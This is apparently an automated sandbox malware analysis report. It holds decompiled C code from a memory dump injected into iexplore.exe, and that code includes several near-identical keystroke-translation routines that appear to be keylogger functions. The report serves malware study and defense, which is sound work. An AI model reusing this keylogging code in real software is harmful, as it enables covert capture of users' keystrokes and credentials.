RegCloseKey.ADVAPI32(00000000,?,FakeMessage,00000000,?,00000000,?,80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C8988C

Strings

FakeMessage, xrefs: 00C8986C
SOFTWARE\FakeMessage, xrefs: 00C8984B

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C83D8C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26
library

C-Code - Quality: 37%

			E00C83D8C() {
				struct HINSTANCE__* _v8;
				intOrPtr _t14;
				intOrPtr _t17;

				_v8 = LoadLibraryA("kernel32.dll");
				_push(_t17);
				_push(0xc83dd5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t17;
				 *0xc8c698 = GetProcAddress(_v8, "IsWow64Process");
				_pop(_t14);
				 *[fs:eax] = _t14;
				_push(E00C83DDC);
				return FreeLibrary(_v8);
			}

0x00c83d9a
0x00c83d9f
0x00c83da0
0x00c83da5
0x00c83da8
0x00c83db9
0x00c83dc0
0x00c83dc3
0x00c83dc6
0x00c83dd4

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C83D95
GetProcAddress.KERNEL32(?,IsWow64Process,00000000,00C83DD5,?,?,?,00C83EE9), ref: 00C83DB4
FreeLibrary.KERNEL32(?,00C83DDC,00C83DD5,?,?,?,00C83EE9), ref: 00C83DCF

Strings

IsWow64Process, xrefs: 00C83DAB
kernel32.dll, xrefs: 00C83D90

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C83E00, Relevance: 7.6, APIs: 5, Instructions: 60

APIs

GetCurrentProcess.KERNEL32(?,00C91F1C), ref: 00C83E1E
IsWow64Process.KERNEL32(00000000,?,00C91F1C), ref: 00C83E24
OpenProcess.KERNEL32(00000400,00000000,00000E70), ref: 00C83E46
IsWow64Process.KERNEL32(?,?,00000000,00C83E98,?,00000400,00000000,00000E70), ref: 00C83E6A
CloseHandle.KERNEL32(?), ref: 00C83E92

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C83FDC, Relevance: 7.5, APIs: 5, Instructions: 37

C-Code - Quality: 100%

			E00C83FDC(WCHAR* __eax, void* __edx) {
				WCHAR* _t2;
				struct HINSTANCE__* _t3;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t7;
				void* _t9;
				struct HRSRC__* _t13;
				void* _t14;
				void* _t19;

				_t2 = __eax;
				_t19 = __edx;
				if(__eax == 0) {
					_t2 =  *0xc8b0b0; // 0xc83fcc
				}
				_t3 =  *0xc8c670; // 0xc80000
				_t13 = FindResourceW(_t3, _t2, 0xa);
				_t5 =  *0xc8c670; // 0xc80000
				SizeofResource(_t5, _t13);
				_t7 =  *0xc8c670; // 0xc80000
				_t14 = LoadResource(_t7, _t13);
				_t9 = LockResource(_t14);
				if(_t9 != 0) {
					E00C82914(_t19, _t9);
					return FreeResource(_t14);
				}
				return _t9;
			}

0x00c83fdc
0x00c83fdf
0x00c83fe3
0x00c83fe5
0x00c83fe5
0x00c83fed
0x00c83ff8
0x00c83ffb
0x00c84001
0x00c84009
0x00c84014
0x00c84017
0x00c8401e
0x00c84025
0x00000000
0x00c8402b
0x00c84033

APIs

FindResourceW.KERNEL32(00C80000,00000000,0000000A), ref: 00C83FF3
SizeofResource.KERNEL32(00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C84001
LoadResource.KERNEL32(00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C8400F
LockResource.KERNEL32(00000000,00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C84017
FreeResource.KERNEL32(00000000,00000000,00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C8402B

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85928(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860c0);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C858D3, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858D3(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc86098);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85906, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85906(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860b0);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C859F4, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C859F4(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc861a0);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C858E4, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858E4(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860a0);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C858B1, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858B1(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc86088);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
